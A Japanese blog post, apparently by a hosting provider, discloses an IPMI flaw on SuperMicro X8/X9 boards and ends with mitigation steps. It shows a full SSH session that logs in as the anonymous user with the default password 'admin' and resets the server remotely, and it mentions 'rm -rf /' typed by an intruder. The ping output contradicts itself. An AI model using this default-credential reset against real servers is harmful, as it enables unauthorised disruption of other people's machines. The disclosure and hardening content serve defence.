これから 、 GlobaTelチームは、ホスティングおよびデータセンターの分野で有益な記事を提供し、技術的な観点から成果を公開することもあります。
今日は、 IPMIの明らかな穴にどう出会ったかについてのシンプルで非常に重要な記事から始めたいと思います。
クライアントの1人が、有名なロシアブランドのxeon E3を搭載した新しいサーバーが非常に頻繁に再起動することを訴えました。 IPMIサーバーにアクセスすると、積極的に
rm -rf /
入力していることがわかりました。 これを見た人は誰でも理解できます。 彼らは電源コードを引き出しました-ネットブックを使ってサーバーをセットアップし、何が何であるかを見つけました。
すべてのIPMI IPをブロックすることでこの問題を解決したとすぐに言わなければなりません。 それらへのアクセスは、事前の要求に応じてIPクライアントに対してのみ発行されるようになりました。
この問題は、シェルバージョン1.00で解決されています。
クランクアップできるトリック(サーバーの再起動)の一部を示します。 SSHを介してIPMIに接続する機能は、誰にも知られていません。 サーバーを再起動できるのはこの機能です。 Webインターフェースを介してanonymouseのパスワードを変更することはできません。anonymousは標準の管理者パスワードを持ち、何らかの理由でSSH経由でマシンを再起動できます。
SSHを介してIPMIに接続する場合のコマンドのリストは次のとおりです。
Password of anonymous: admin
# ssh -o PreferredAuthentications=password,keyboard-interactive -l "" IPMI
@IPMI's password:
Auth User/Pass with PS...pass.
ATEN SMASH-CLP System Management Shell, version 1.00
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved
-> show
/
Targets :
system1
Properties :
None
Verbs :
cd
show
help
version
exit
-> cd system1
/system1
-> show /system1/pwrmgtsvc1
/system1/pwrmgtsvc1
Targets :
none
Properties :
Name=IPMI Power Service
CreationClassName=IPMI_PowerManagementService
ElementName=Server Power Management Service
EnabledState=5
RequestedState=12
EnabledDefault=2
PowerState=1
Verbs :
cd
show
help
version
exit
start
stop
reset
-> reset /system1/pwrmgtsvc1
/system1/pwrmgtsvc1
reset done...
サーバーにpingを実行します。
ping IpOfServer
Pinging IpOfServer with 32 bytes of data:
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Ping statistics for IpOfServer:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
ご覧のとおり、pingはありません。サーバーが再起動します。
追加-この問題は、SuperMicroマザーボードX8およびX9シリーズのIPMIバージョン2.0(BIOSではない)1.00、およびXeon 56xxシリーズプロセッサのデュアルプロセッサボードに関連しています。
ユーザーanonymouseをシャットダウンするには、ipmitoolを使用する必要があります。
Linuxにインストールするためのリスト:
wget ftp.supermicro.com/utility/IPMICFG/Linux/IPMICFG-Linux_v1.41.zip
unzip IPMICFG-Linux_v1.41.zip
cd IPMICFG-Linux_v1.41_110706/
chmod 755 *
anonymouseを無効にするコマンド:
ipmitool user disable 1